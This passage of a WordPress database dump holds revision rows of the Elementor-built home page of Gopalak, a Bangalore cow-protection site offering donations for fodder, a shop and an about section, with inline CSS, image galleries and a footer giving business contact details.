href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:04:56','2022-10-28 06:34:56','',1373,'https://gopalak.in/?p=2012',0,'revision','',0),(2013,1,'2022-10-28 12:04:56','2022-10-28 06:34:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:04:56','2022-10-28 06:34:56','',1373,'https://gopalak.in/?p=2013',0,'revision','',0),(2014,1,'2022-10-28 12:07:35','2022-10-28 06:37:35','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom 